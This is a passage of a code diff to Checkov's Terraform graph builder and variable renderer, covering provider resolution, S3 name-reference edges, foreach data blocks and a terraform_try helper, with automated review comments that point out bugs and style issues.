{len(self.vertices)} vertices and {len(self.edges)} edges") renderer = TerraformVariableRenderer(self) 
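Review bot: `self.enable_datas_foreach_handling` is read from `CHECKOV_ENABLE_DATAS_FOREACH_HANDLING` here, but nothing in this hunk, in the `build_graph` guard hunk below it, or in the `_create_vertices` hunk further down consults it: `BlockType.DATA` blocks are appended to `foreach_blocks` whenever `enable_foreach_handling` is on, and the `build_graph` guard still tests only the two pre-existing flags. Unless the flag is consumed elsewhere in the commit, data-block foreach handling is effectively always enabled despite the `'False'` default. If it is meant to gate the feature, `_create_vertices` should check it before collecting data blocks, e.g. `and (block.block_type in (BlockType.MODULE, BlockType.RESOURCE) or (block.block_type == BlockType.DATA and self.enable_datas_foreach_handling))`. The `build_graph` guard could also read `any(self.foreach_blocks.values())` rather than naming every block type.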
@@ -89,6 +105,11 @@ def build_graph(self, render_variables: bool) -> None: edges_count = len(self.edges) self._build_cross_variable_edges() logging.info(f"Found {len(self.edges) - edges_count} cross variable edges") + # building S3 edges by name for terraform graph + logging.info("Building S3 edges name references") + edges_count = len(self.edges) + self._build_s3_name_reference_edges() + logging.info(f"Found {len(self.edges) - edges_count} S3 name references edges") else: self.update_vertices_fields() @@ -96,6 +117,10 @@ def update_vertices_fields(self) -> None: # Important to keep those 2 functions together, as the first affects the calculation of the second self._update_vertices_breadcrumbs_and_module_connections() self._update_nested_modules_address() + try: + self._add_provider_attr_to_resources() + except Exception as e: + logging.info(f'Failed to add provider attributes to resources, error: {str(e)}') def _create_vertices(self) -> None: logging.info("Creating vertices") @@ -105,7 +130,7 @@ def _create_vertices(self) -> None: self._add_block_data_to_graph(i, block) if self.enable_foreach_handling and ( checkov.terraform.graph_builder.foreach.consts.FOREACH_STRING in block.attributes or checkov.terraform.graph_builder.foreach.consts.COUNT_STRING in block.attributes) \ - and block.block_type in (BlockType.MODULE, BlockType.RESOURCE): + and block.block_type in (BlockType.MODULE, BlockType.RESOURCE, BlockType.DATA): self.foreach_blocks[block.block_type].append(i) def _add_block_data_to_graph(self, idx: int, block: TerraformBlock) -> None: 
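Review bot: The new `try`/`except Exception` around `self._add_provider_attr_to_resources()` logs the failure at INFO and continues, so a defect in the long provider-resolution method added further down (which indexes `vertex.config[v_name[0]][v_name[1]]` and `providers[0]` without guards) would silently leave resources without provider attributes; `logging.warning(...)`, or `logging.exception(...)` to keep the traceback, is the level the `_connect_module_provider` hunk in this same file uses for the equivalent situation. The S3-edge block in the `@@ -89` hunk repeats the `edges_count` / `logging.info` pattern of the cross-variable pass just above it; a small helper taking the builder callable and the log label would remove the duplication if a third pass is ever added. `update_vertices_fields` and `build_graph` both extend outside the hunk.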
@@ -122,6 +147,102 @@ def _add_block_data_to_graph(self, idx: int, block: TerraformBlock) -> None: self.in_edges[idx] = [] self.out_edges[idx] = [] + def _add_provider_attr_to_resources(self) -> None: + """ + Assign provider attributes to resource vertices in the Terraform configuration. + + This function iterates through all vertices, and for each vertex that is of the + `RESOURCE` block type, it attempts to determine and assign the appropriate + provider based on the vertex's attributes and the module's temporary Terraform + definitions. + + The function performs the following steps: + 1. Iterates over each vertex in `self.vertices`. + 2. Checks if the vertex's `block_type` is `RESOURCE`. + 3. Determines the path for the Terraform definition. + 4. Checks for the presence of a provider in the vertex's attributes. + 5. If no provider is found, checks in the module's temporary Terraform definition. + 6. If still no provider is found, iterates through nested modules to find a provider. + 7. Assigns the provider fields to the vertex once a provider is determined. 
+ """ + for vertex in self.vertices: + if vertex.block_type == BlockType.RESOURCE: + path_for_tf_definition = TFDefinitionKey(file_path=vertex.path, tf_source_modules=vertex.source_module_object) + if BlockType.PROVIDER in vertex.attributes: + provider = self._get_the_default_provider(vertex.attributes[BlockType.PROVIDER], path_for_tf_definition) + self._assign_provider_fields(vertex, provider) + elif BlockType.PROVIDER in self.module.temp_tf_definition.get(path_for_tf_definition, {}): + provider_name = self._get_the_default_provider(self.module.temp_tf_definition.get(path_for_tf_definition, {}).get(BlockType.PROVIDER, []), path_for_tf_definition, is_same_file=True) + v_name = vertex.name.split('.') + provider_name = vertex.config[v_name[0]][v_name[1]][CustomAttributes.TF_RESOURCE_ADDRESS].replace(vertex.name, provider_name) + self._assign_provider_fields(vertex, provider_name) + else: + while path_for_tf_definition.tf_source_modules: + if self.module.temp_tf_definition and path_for_tf_definition.tf_source_modules and BlockType.PROVIDER in self.module.temp_tf_definition.get(path_for_tf_definition, ''): + module = [m for m in self.module.temp_tf_definition.get(path_for_tf_definition).get(BlockType.MODULE) if list(m.keys())[0] == vertex.source_module_object.name] # type:ignore + provider_name = self._get_the_default_provider(self.module.temp_tf_definition.get(TFDefinitionKey(path_for_tf_definition.tf_source_modules.path), {}).get(BlockType.PROVIDER, []), path_for_tf_definition, module=module) + self._assign_provider_fields(vertex, provider_name) + break + elif path_for_tf_definition.tf_source_modules and BlockType.PROVIDER in self.module.temp_tf_definition.get(TFDefinitionKey(path_for_tf_definition.tf_source_modules.path), {}): + if vertex.source_module_object and vertex.source_module_object.nested_tf_module: + module = [m for m in self.module.temp_tf_definition.get(TFDefinitionKey(path_for_tf_definition.tf_source_modules.path)).get(BlockType.MODULE) if 
list(m.keys())[0] == vertex.source_module_object.nested_tf_module.name] # type:ignore + provider_name = self._get_the_default_provider(self.module.temp_tf_definition.get(TFDefinitionKey(path_for_tf_definition.tf_source_modules.path), {}).get(BlockType.PROVIDER, []), path_for_tf_definition, module=module) + self._assign_provider_fields(vertex, provider_name) + else: + module = [m for m in self.module.temp_tf_definition.get(TFDefinitionKey(path_for_tf_definition.tf_source_modules.path)).get(BlockType.MODULE) if list(m.keys())[0] == vertex.source_module_object.name] # type:ignore + provider_name = self._get_the_default_provider(self.module.temp_tf_definition.get(TFDefinitionKey(path_for_tf_definition.tf_source_modules.path), {}).get(BlockType.PROVIDER, []), path_for_tf_definition, module=module) + self._assign_provider_fields(vertex, provider_name) + break + else: + path_for_tf_definition = TFDefinitionKey(tf_source_modules=path_for_tf_definition.tf_source_modules.nested_tf_module, file_path=path_for_tf_definition.tf_source_modules.path) + + @staticmethod + def _assign_provider_fields(vertex: TerraformBlock, provider_name: str) -> None: + vertex.attributes[CustomAttributes.PROVIDER_ADDRESS] = provider_name + v_name = vertex.name.split('.') + vertex.config[v_name[0]][v_name[1]][CustomAttributes.PROVIDER_ADDRESS] = provider_name + + def _get_provider_address(self, path_for_tf_definition: TFDefinitionKeyType) -> list[int] | None: + if isinstance(path_for_tf_definition, TFDefinitionKey): + return self.vertices_by_module_dependency[path_for_tf_definition.tf_source_modules].get(BlockType.PROVIDER) + return None + + def _get_the_default_provider( + self, + providers: list[dict[str, dict[str, Any]] | str], + path_for_tf_definition: TFDefinitionKeyType, + module: Optional[list[dict[str, Any]]] = None, + is_same_file: bool = False + ) -> str: + provider_address = self._get_provider_address(path_for_tf_definition) + if module and len(module) > 0: + module_providers = 
module[0][list(module[0].keys())[0]].get('providers', [''])[0] + if module_providers: + for _, m_alias in module_providers.items(): + if not provider_address: + return cast(str, module_providers[list(module_providers.keys())[0]].replace(DOLLAR_PREFIX, "").replace(LEFT_CURLY, "").replace(RIGHT_CURLY, "")) + else: + for p_address in provider_address: + if m_alias.replace(DOLLAR_PREFIX, "").replace(LEFT_CURLY, "").replace(RIGHT_CURLY, "") == self.vertices[p_address].name: + return cast(str, self.vertices[p_address].config[list(self.vertices[p_address].config)[0]].get(CustomAttributes.TF_RESOURCE_ADDRESS)) + + if isinstance(providers[0], str): + for provider in providers: + if provider_address: + for address in provider_address: + if self.vertices[address].name == provider: + return cast(str, self.vertices[address].config[list(self.vertices[address].config)[0]].get(CustomAttributes.TF_RESOURCE_ADDRESS)) + else: + for provider in providers: + provider_name = list(provider.keys())[0] # type:ignore + if 'alias' not in provider[provider_name]: + if provider_address and not is_same_file: + for p_address in provider_address: + if self.vertices[p_address].name == provider_name: + return cast(str, self.vertices[p_address].config[list(self.vertices[p_address].config.keys())[0]][CustomAttributes.TF_RESOURCE_ADDRESS]) + return f'{provider_name}.default' + return '' + def _arrange_graph_data(self) -> None: # reset all the relevant data self.vertices_by_block_type = defaultdict(list) 
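Review bot: In `_get_the_default_provider`, `if isinstance(providers[0], str):` raises IndexError when `providers` is empty, and the nested-module call sites pass `.get(BlockType.PROVIDER, [])`, which can be `[]`; guard it with `if providers and isinstance(providers[0], str):`. In `_add_provider_attr_to_resources`, `self.module.temp_tf_definition.get(path_for_tf_definition, '')` defaults to a string on which the code then evaluates `BlockType.PROVIDER in ...`, a substring test rather than a key test — use `{}` as the neighbouring branches do — and the `.get(...).get(BlockType.MODULE)` chains marked `# type:ignore` raise AttributeError on a missing key instead of producing an empty module list. The `for _, m_alias in module_providers.items():` loop returns on its first iteration whenever `provider_address` is falsy without looking at `m_alias`, so that early return belongs before the loop. The docstring narrates the steps of the method; a sentence on what `CustomAttributes.PROVIDER_ADDRESS` ends up holding (the matched provider vertex's `TF_RESOURCE_ADDRESS`, `<name>.default`, or `''`) would serve readers better than the numbered walkthrough.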
@@ -192,7 +313,7 @@ def _build_edges_for_vertex(self, origin_node_index: int, vertex: TerraformBlock resources_types=resources_types, ) for vertex_reference in referenced_vertices: - # for certain blocks such as data and resource, the block name is composed from several parts. + # for certain blocks such as data and resource, the block name is composed of several parts. # the purpose of the loop is to avoid not finding the node if the name has several parts sub_values = [remove_index_pattern_from_str(sub_value) for sub_value in vertex_reference.sub_parts] for i in range(len(sub_values)): 
@@ -283,6 +404,32 @@ def _get_target_variables(self, vertex: TerraformBlock, dest_module_path: str) - if self.get_dirname(self.vertices[index].path) == dest_module_path ] + def _connect_module_provider(self) -> None: + for origin_node_index, referenced_vertices in self.out_edges.items(): + if not referenced_vertices: + continue + vertex = self.vertices[origin_node_index] + # if we have an edge of module->provider we need to connect that modules' resources to the provider + if vertex.block_type == BlockType.MODULE: + try: + tf_def = vertex.config.get(vertex.name, {}).get(RESOLVED_MODULE_ENTRY_NAME) + if tf_def and isinstance(tf_def, list): + if isinstance(tf_def[0], str): + definition = json.loads(tf_def[0]) + tf_module = TFDefinitionKey.from_json(definition).tf_source_modules + else: + tf_module = tf_def[0].tf_source_modules + # get all resources connected to module + resources = self.vertices_by_module_dependency[tf_module].get("resource") + if resources: + # search for provider vertices in the referenced vertices + for e in referenced_vertices: + if self.vertices[e.dest].block_type == BlockType.PROVIDER: + for resource in resources: + self.create_edge(resource, e.dest, e.label) + except Exception as e: + logging.warning(f"Failed in connecting module resources to provider due to {e}") + def _build_cross_variable_edges(self) -> None: aliases = self._get_aliases() resources_types = self.get_resources_types_in_graph() 
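Review bot: `self.vertices_by_module_dependency[tf_module].get("resource")` uses the string literal `"resource"` where the rest of this hunk uses `BlockType.MODULE` and `BlockType.PROVIDER`, and because `vertices_by_module_dependency` is a `defaultdict` the bare index inserts an empty entry for any module key it has not seen; `resources = self.vertices_by_module_dependency.get(tf_module, {}).get(BlockType.RESOURCE)` fixes both. The `except Exception` is wide enough to hide a malformed `RESOLVED_MODULE_ENTRY_NAME` value rejected by `json.loads` and a failing `TFDefinitionKey.from_json` alike; `logging.exception(...)` in place of `logging.warning(f"... {e}")` keeps the traceback for whoever has to debug it. The comment `# get all resources connected to module` could also say that each resource edge reuses the module edge's label, since that is what makes the provider link on a resource indistinguishable from a direct one.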
@@ -293,6 +440,34 @@ def _build_cross_variable_edges(self) -> None: modules = vertex.breadcrumbs.get(CustomAttributes.SOURCE_MODULE, []) self._build_edges_for_vertex(origin_node_index, vertex, aliases, resources_types, True, modules) + def _build_s3_name_reference_edges(self) -> None: + # Supporting reference by name of S3 bucket + resources_types = self.get_resources_types_in_graph() + if S3_BUCKET_RESOURCE_NAME not in resources_types: + return + # Find all the edges leading to S3 bucket and their references + s3_buckets_mapping: Dict[int, S3ConnectedResources] = {} + for origin_node_index, referenced_vertices in self.out_edges.items(): + vertex = self.vertices[origin_node_index] + if vertex.block_type != BlockType.RESOURCE: + continue + for referenced_vertice in referenced_vertices: + if referenced_vertice.label == S3_BUCKET_REFERENCE_ATTRIBUTE: + current = s3_buckets_mapping.get(referenced_vertice.dest, {"bucket_resource_index": None, "referenced_vertices": list()}) + if vertex.id.startswith(f"{S3_BUCKET_RESOURCE_NAME}."): + current["bucket_resource_index"] = origin_node_index + else: + current["referenced_vertices"].append(referenced_vertice) + s3_buckets_mapping[referenced_vertice.dest] = current + + # Create new edges of the found connections + for destination, mapping in s3_buckets_mapping.items(): + if self.vertices[destination].block_type in [BlockType.VARIABLE, BlockType.LOCALS]: + if mapping["bucket_resource_index"] is None: + continue + for reference_vertex in mapping["referenced_vertices"]: + self.create_edge(mapping["bucket_resource_index"], reference_vertex.origin, S3_BUCKET_REFERENCE_ATTRIBUTE, True) + def create_edge(self, origin_vertex_index: int, dest_vertex_index: int, label: str, cross_variable_edges: bool = False) -> bool: if origin_vertex_index == dest_vertex_index: 
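Review bot: In `_build_s3_name_reference_edges`, `current["bucket_resource_index"] = origin_node_index` overwrites any bucket recorded earlier for the same variable or local, so when two `aws_s3_bucket` resources take their name from the same `var`/`local`, every `bucket`-referencing resource is attached to whichever bucket was visited last and the first bucket gets no edges. Either store a list of bucket indexes and create an edge per bucket, or mark the entry ambiguous and skip it in the second loop; which is right depends on how the downstream checks consume these edges, so a comment stating the chosen rule is needed either way. Two small style points: `{"bucket_resource_index": None, "referenced_vertices": list()}` can use `[]`, and `in [BlockType.VARIABLE, BlockType.LOCALS]` is conventionally a tuple. The method lies entirely inside the hunk; `create_edge` below is context.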
@@ -382,7 +557,7 @@ def _find_vertex_index_relative_to_path( module_dependency_by_name_key = vertex.source_module_object # important to use this specific map for big graph performance - possible_vertices = self.vertices_by_module_dependency_by_name.get(module_dependency_by_name_key, {}).get(block_type, {}).get(name, []) + possible_vertices = self._get_possible_vertices(module_dependency_by_name_key, block_type, name) for vertex_index in possible_vertices: vertex = self.vertices[vertex_index] if self.get_dirname(vertex.path) == self.get_dirname(block_path): 
@@ -394,23 +569,70 @@ def _find_vertex_index_relative_to_path( relative_vertex = self._find_vertex_with_best_match(relative_vertices, block_path, origin_vertex_index) return relative_vertex + def _get_possible_vertices(self, module_dependency_by_name_key: TFModule | None, block_type: str, name: str) -> list[int]: + possible_vertices = self.vertices_by_module_dependency_by_name.get(module_dependency_by_name_key, {}).get(block_type, {}).get(name, []) + if possible_vertices: + return possible_vertices + return self.vertices_by_module_dependency_by_name.get(module_dependency_by_name_key, {}).get(block_type, {}).get(name.replace(LEFT_BRACKET_WITH_QUOTATION, LEFT_BRACKET).replace(RIGHT_BRACKET_WITH_QUOTATION, RIGHT_BRACKET), []) + def _find_vertex_with_best_match(self, relevant_vertices_indexes: List[int], origin_path: str, origin_vertex_index: Optional[int] = None) -> int: vertex_index_with_longest_common_prefix = -1 longest_common_prefix = "" + vertices_with_longest_common_prefix = [] + origin_real_path = os.path.realpath(origin_path) for vertex_index in relevant_vertices_indexes: vertex = self.vertices[vertex_index] - common_prefix = os.path.commonpath([os.path.realpath(vertex.path), os.path.realpath(origin_path)]) - if len(common_prefix) > len(longest_common_prefix): - vertex_index_with_longest_common_prefix = vertex_index - longest_common_prefix = common_prefix - elif len(common_prefix) == len(longest_common_prefix) and origin_vertex_index: + if vertex.path in self._vertex_path_to_realpath_cache: + # Using cache to make sure performance stays stable + vertex_realpath = self._vertex_path_to_realpath_cache[vertex.path] + else: + vertex_realpath = os.path.realpath(vertex.path) + self._vertex_path_to_realpath_cache[vertex.path] = vertex_realpath + common_prefix = os.path.commonpath([vertex_realpath, origin_real_path]) + + # checks if module name is same for dest and origin vertex. 
+ if origin_vertex_index is not None: vertex_module_name = vertex.attributes.get(CustomAttributes.TF_RESOURCE_ADDRESS, '') origin_module_name = self.vertices[origin_vertex_index].attributes.get(CustomAttributes.TF_RESOURCE_ADDRESS, '') if vertex_module_name.startswith(BlockType.MODULE) and origin_module_name.startswith(BlockType.MODULE): split_module_name = vertex_module_name.split('.')[1] if origin_module_name.startswith(f'{BlockType.MODULE}.{split_module_name}'): - vertex_index_with_longest_common_prefix = vertex_index + common_prefix = f"{common_prefix} {BlockType.MODULE}.{split_module_name}" + + if len(common_prefix) > len(longest_common_prefix): + vertex_index_with_longest_common_prefix = vertex_index + longest_common_prefix = common_prefix + vertices_with_longest_common_prefix = [(vertex_index, vertex)] + elif len(common_prefix) == len(longest_common_prefix): + vertices_with_longest_common_prefix.append((vertex_index, vertex)) + + if len(vertices_with_longest_common_prefix) <= 1: + return vertex_index_with_longest_common_prefix + + # Try to compare based on foreach attributes if we have more than 1 vertex in the list + if origin_vertex_index is not None: + return self._find_best_match_based_on_foreach_key(origin_vertex_index, vertices_with_longest_common_prefix, + vertex_index_with_longest_common_prefix) + return vertex_index_with_longest_common_prefix + + def _find_best_match_based_on_foreach_key( + self, + origin_vertex_index: int, + vertices_with_longest_common_prefix: list[tuple[int, TerraformBlock]], + vertex_index_with_longest_common_prefix: int + ) -> int: + origin_vertex = self.vertices[origin_vertex_index] + for vertex_index, vertex in vertices_with_longest_common_prefix: + vertex_address = vertex.attributes.get(CustomAttributes.TF_RESOURCE_ADDRESS, '') + vertex_foreach_value = vertex.for_each_index + origin_address = origin_vertex.attributes.get(CustomAttributes.TF_RESOURCE_ADDRESS, '') + origin_foreach_value = origin_vertex.for_each_index + if 
origin_foreach_value == vertex_foreach_value and origin_address != '' and \ + get_terraform_foreach_or_count_key(origin_address) == \ + get_terraform_foreach_or_count_key(vertex_address): + return vertex_index + return vertex_index_with_longest_common_prefix def get_vertices_hash_codes_to_attributes_map(self) -> Dict[str, Dict[str, Any]]: @@ -667,7 +889,8 @@ def update_list_attribute( if len(key_parts) == 1: idx = force_int(key_parts[0]) - inner_config = config[0] + # Avoid changing the config and cause side effects + inner_config = pickle_deepcopy(config[0]) if idx is not None and isinstance(inner_config, list): if not inner_config: @@ -675,7 +898,7 @@ def update_list_attribute( return config inner_config[idx] = new_value - return config + return [inner_config] entry_to_update = int(key_parts[0]) if key_parts[0].isnumeric() else -1 for i, config_value in enumerate(config): if entry_to_update == -1: @@ -687,4 +910,5 @@ def update_list_attribute( def get_vertex_as_tf_module(block: TerraformBlock) -> TFModule: - return TFModule(block.path, block.name, block.source_module_object) + block_name = get_sanitized_terraform_resource_id(block.name) + return TFModule(path=block.path, name=block_name, nested_tf_module=block.source_module_object, foreach_idx=block.for_each_index) diff --git a/checkov/terraform/graph_builder/utils.py b/checkov/terraform/graph_builder/utils.py index 66918d964b5..c4f3b7318b6 100644 --- a/checkov/terraform/graph_builder/utils.py +++ b/checkov/terraform/graph_builder/utils.py 
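Review bot: In `_find_vertex_with_best_match`, appending `f" {BlockType.MODULE}.{split_module_name}"` to `common_prefix` so that `len(common_prefix)` grows is a string-length trick: the bonus a vertex receives depends on how long its module name is, so the ranking between a same-module vertex and one with a longer real path prefix now hinges on name length, and `len()` of a path with a module name glued on is hard to reason about. Rank with a tuple instead — `(len(common_prefix), module_matches)` for "longest path, same module as tie-break", or the reverse if the module match should dominate — so the intended priority is stated rather than encoded in string lengths. `vertices_with_longest_common_prefix = []` is the only unannotated local in the method; `list[tuple[int, TerraformBlock]]` per the helper's signature. In `_find_best_match_based_on_foreach_key`, `origin_address` and `origin_foreach_value` do not change across iterations and can be read once before the `for`.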
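Review bot: The `pickle_deepcopy(config[0])` in `update_list_attribute` protects only the `len(key_parts) == 1` list path; in the `@@ -675` hunk the fall-through `for i, config_value in enumerate(config)` loop, whose body is outside the hunk, still appears to operate on the original `config`, so the comment `# Avoid changing the config and cause side effects` promises more than the change delivers — either copy once at the top of the function or narrow the comment to this branch. The copy is also made before the `isinstance(inner_config, list)` test, so non-list entries are deep-copied and then discarded on the `return config` path; moving the copy inside the `if` avoids that cost. `update_list_attribute` starts outside the hunk. In `get_vertex_as_tf_module` (the `@@ -687` hunk), a one-line comment on why the name is sanitised — presumably so every foreach/count copy of a block maps to the same `TFModule` key — would explain the `get_sanitized_terraform_resource_id` call.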
@@ -173,6 +173,11 @@ def remove_index_pattern_from_str(str_value: str) -> str: # otherwise it can't be accessed via index return str_value + # Workaround for cases where the string value contains a map attribute access for foreach data block + # UT for this - `test_foreach_data_with_resource` -> /variable_rendering/test_foreach_renderer.py + if "data." in str_value: + return str_value + str_value = re.sub(INDEX_PATTERN, "", str_value) str_value = str_value.replace('["', CHECKOV_LOREM_IPSUM_VAL).replace("[", " [ ").replace(CHECKOV_LOREM_IPSUM_VAL, '["') str_value = str_value.replace('"]', CHECKOV_LOREM_IPSUM_VAL).replace("]", " ] ").replace(CHECKOV_LOREM_IPSUM_VAL, '"]') @@ -258,7 +263,6 @@ def get_referenced_vertices_in_str_value( str_value = remove_function_calls_from_str(str_value=str_value) str_value = remove_index_pattern_from_str(str_value=str_value) - str_value = replace_map_attribute_access_with_dot(str_value=str_value) str_value = remove_interpolation(str_value=str_value) references_vertices = get_vertices_references(str_value, aliases, resources_types) diff --git a/checkov/terraform/graph_builder/variable_rendering/evaluate_terraform.py b/checkov/terraform/graph_builder/variable_rendering/evaluate_terraform.py index 350ee80d005..c84f85c2f98 100644 --- a/checkov/terraform/graph_builder/variable_rendering/evaluate_terraform.py +++ b/checkov/terraform/graph_builder/variable_rendering/evaluate_terraform.py @@ -56,6 +56,7 @@ def evaluate_terraform(input_str: Any, keep_interpolations: bool = True) -> Any: evaluated_value = evaluate_list_access(evaluated_value) evaluated_value = strip_double_quotes(evaluated_value) evaluated_value = evaluate_directives(evaluated_value) + evaluated_value = strip_interpolation_marks(evaluated_value) evaluated_value = evaluate_conditional_expression(evaluated_value) evaluated_value = evaluate_compare(evaluated_value) evaluated_value = evaluate_json_types(evaluated_value) 
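Review bot: The early return `if "data." in str_value` is a substring test, so it also fires for `metadata.`, `user_data.`, `local.my_data.x` and similar names, leaving their index patterns unstripped and presumably breaking reference resolution for values that have nothing to do with foreach data blocks. A boundary-anchored test keeps the workaround to actual `data.` references: `if re.search(r'(?<![\w.])data\.', str_value): return str_value` (`re` is already used two lines below). The comment should also say which outputs this workaround gives up for real `data.` references, since `remove_index_pattern_from_str` continues past the hunk and the index stripping it skips is the function's whole job.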
@@ -193,17 +194,30 @@ def strip_double_quotes(input_str: str) -> str: return input_str -def evaluate_conditional_expression(input_str: str) -> str: +def strip_interpolation_marks(input_str: str) -> str: if input_str.startswith("${") and input_str.endswith("}"): - # just remove the needed char length of the interpolation marks + # remove the needed char length of the interpolation marks input_str = input_str[2:-1] + return input_str + + +def evaluate_conditional_expression(input_str: str) -> str: + if input_str.startswith("['${") and input_str.endswith("}']"): + condition = find_conditional_expression_groups(input_str[4:-3]) + if condition is not None: + input_str = input_str[4:-3] + else: + condition = find_conditional_expression_groups(input_str) + if condition is None: + return input_str - condition = find_conditional_expression_groups(input_str) while condition: groups, start, end = condition if len(groups) != 3: return input_str - evaluated_condition = evaluate_terraform(groups[0]) + evaluated_condition = evaluate_compare(groups[0]) + if type(evaluated_condition) is str: + evaluated_condition = evaluate_terraform(groups[0]) condition_substr = input_str[start:end] bool_evaluated_condition = convert_to_bool(evaluated_condition) if bool_evaluated_condition is True: @@ -395,12 +409,12 @@ def apply_binary_op(a: Optional[Union[str, int, bool]], b: Optional[Union[str, i if type_a != type_b: try: temp_b = type_a(b) # type:ignore[misc,arg-type] - if isinstance(type_a, bool): + if isinstance(a, bool) and b: temp_b = bool(convert_to_bool(b)) return operators[operator](a, temp_b) # type:ignore[type-var] except Exception: temp_a = type_b(a) # type:ignore[misc,arg-type] - if isinstance(type_b, bool): + if isinstance(b, bool) and a: temp_a = bool(convert_to_bool(a)) return operators[operator](temp_a, b) # type:ignore[type-var] else: 
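Review bot: `if type(evaluated_condition) is str:` should be `if isinstance(evaluated_condition, str):`; the identity check on `type()` is the form flake8-bugbear flags and it misses `str` subclasses. In the same hunk the `['${ ... }']` branch only unwraps the value when `find_conditional_expression_groups` matches the inner text and otherwise returns the wrapped string unchanged, never falling through to the whole-string lookup in the `else` branch; if that is intended, a comment such as `# a stringified one-element list around an interpolation; unwrap only when it carries a conditional` would save the trace. `evaluate_conditional_expression` runs past the end of this hunk.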
diff --git a/checkov/terraform/graph_builder/variable_rendering/renderer.py b/checkov/terraform/graph_builder/variable_rendering/renderer.py index 0215e1901e9..d505be1c88d 100644 --- a/checkov/terraform/graph_builder/variable_rendering/renderer.py +++ b/checkov/terraform/graph_builder/variable_rendering/renderer.py @@ -58,6 +58,10 @@ TYPE_REGEX = re.compile(r'^(\${)?([a-z]+)') CHECKOV_RENDER_MAX_LEN = force_int(os.getenv("CHECKOV_RENDER_MAX_LEN", "10000")) +DATA_SPECIAL_KEYWORDS = { + "policy_data": "binding" +} + class TerraformVariableRenderer(VariableRenderer["TerraformLocalGraph"]): def __init__(self, local_graph: "TerraformLocalGraph") -> None: @@ -182,6 +186,10 @@ def extract_value_from_vertex(self, key_path: List[str], attributes: Dict[str, A value = attributes.get(key, None) if value is not None: return value + special_key = DATA_SPECIAL_KEYWORDS.get(key, '') + value = attributes.get(special_key) + if attributes.get('block_type_') == BlockType.DATA and value is not None: + return {special_key: value} if attributes.get(CustomAttributes.BLOCK_TYPE) in (BlockType.VARIABLE, BlockType.TF_VARIABLE): var_type = attributes.get('type') @@ -236,6 +244,8 @@ def find_path_from_referenced_vertices( name = ".".join(copy_of_attribute_path[: i + 1]) if vertex_attributes[CustomAttributes.BLOCK_NAME] == name: return attribute_path, vertex_reference.origin_value + elif vertex_attributes[CustomAttributes.BLOCK_NAME] == name.replace(LEFT_BRACKET_WITH_QUOTATION, LEFT_BRACKET).replace(RIGHT_BRACKET_WITH_QUOTATION, RIGHT_BRACKET): + return attribute_path, vertex_reference.origin_value elif block_type == BlockType.MODULE: copy_of_attribute_path.reverse() for i, _ in enumerate(copy_of_attribute_path): 
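Review bot: The new DATA_SPECIAL_KEYWORDS lookup in `extract_value_from_vertex` reads the block type through the literal `'block_type_'` while the very next statement reads it through `CustomAttributes.BLOCK_TYPE`; if both name the same key the literal is a duplicated magic string, and if they do not, the `BlockType.DATA` comparison never matches. It also performs `attributes.get('')` for every key that is not in the map. Guarding on the map hit first and reusing the constant keeps the two lookups consistent (assuming the constant is the key spelled `'block_type_'`); the surrounding method is outside the hunk:
```python
# … unchanged: direct `attributes.get(key)` lookup …
special_key = DATA_SPECIAL_KEYWORDS.get(key)
if special_key and attributes.get(CustomAttributes.BLOCK_TYPE) == BlockType.DATA:
    value = attributes.get(special_key)
    if value is not None:
        return {special_key: value}
# … unchanged: variable / tf_variable type handling …
```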
@@ -363,6 +373,9 @@ def _process_dynamic_blocks(dynamic_blocks: list[dict[str, Any]] | dict[str, Any dynamic_arguments: list[str] = [] TerraformVariableRenderer._extract_dynamic_arguments(block_name, block_content, dynamic_arguments, []) + if not dynamic_arguments and len(dynamic_values) == 1: + for argument, _ in block_content.items(): + dynamic_arguments.append(argument) if dynamic_arguments and isinstance(dynamic_values, list): block_confs = [] for dynamic_value in dynamic_values: diff --git a/checkov/terraform/graph_builder/variable_rendering/safe_eval_functions.py b/checkov/terraform/graph_builder/variable_rendering/safe_eval_functions.py index 6f366bf466f..0c5929ff9d4 100644 --- a/checkov/terraform/graph_builder/variable_rendering/safe_eval_functions.py +++ b/checkov/terraform/graph_builder/variable_rendering/safe_eval_functions.py @@ -1,3 +1,5 @@ +from __future__ import annotations + import itertools import logging import re @@ -257,9 +259,29 @@ def formatdate(format_str: str, input_str: str) -> str: return dt.strftime(processed_format_str) +def terraform_try(*args: Any) -> Any: + """ + From terraform docs: + "try evaluates all of its argument expressions in turn and returns the result of the first one that does not + produce any errors." + """ + for arg in args: + try: + return evaluate(arg) if isinstance(arg, str) else arg + except Exception as e: + logging.warning(f"Error in evaluate_try of argument {arg} - {e}") + continue + raise Exception(f"No argument can be evaluated for try of {args}") + + SAFE_EVAL_FUNCTIONS: List[str] = [] SAFE_EVAL_DICT = dict([(k, locals().get(k, None)) for k in SAFE_EVAL_FUNCTIONS]) + +# type conversion functions +TRY_STR_REPLACEMENT = "__terraform_try__" +SAFE_EVAL_DICT[TRY_STR_REPLACEMENT] = terraform_try + # math functions SAFE_EVAL_DICT["abs"] = abs SAFE_EVAL_DICT["ceil"] = ceil 
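Review bot: The fallback `for argument, _ in block_content.items(): dynamic_arguments.append(argument)` iterates `.items()` only to discard the values; `dynamic_arguments.extend(block_content)` says the same in one line. `len(dynamic_values) == 1` is also evaluated before the `isinstance(dynamic_values, list)` test on the following line, so if `dynamic_values` can be a scalar here this raises `TypeError` — hedged, because its type is not visible in the hunk. `_process_dynamic_blocks` starts before and ends after this hunk.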
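Review bot: `terraform_try` feeds each string argument back into `evaluate`, which (per the `evaluate` hunk further down in this file) is `eval` with only `__builtins__` nulled; a builtins-less `eval` is not an isolation boundary, so the `# nosec` on that call should not be read as making this new path safe for untrusted Terraform, and the docstring should say so. Failing arms are the normal use of `try`, so `logging.warning` per arm is noise — `logging.debug` is the right level — and the closing `raise Exception(...)` should be a narrower type such as `ValueError` that callers can distinguish from a crash. A one-line comment on the `continue`, e.g. `# a failing arm is expected; try the next candidate`, would make the loop's intent obvious.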
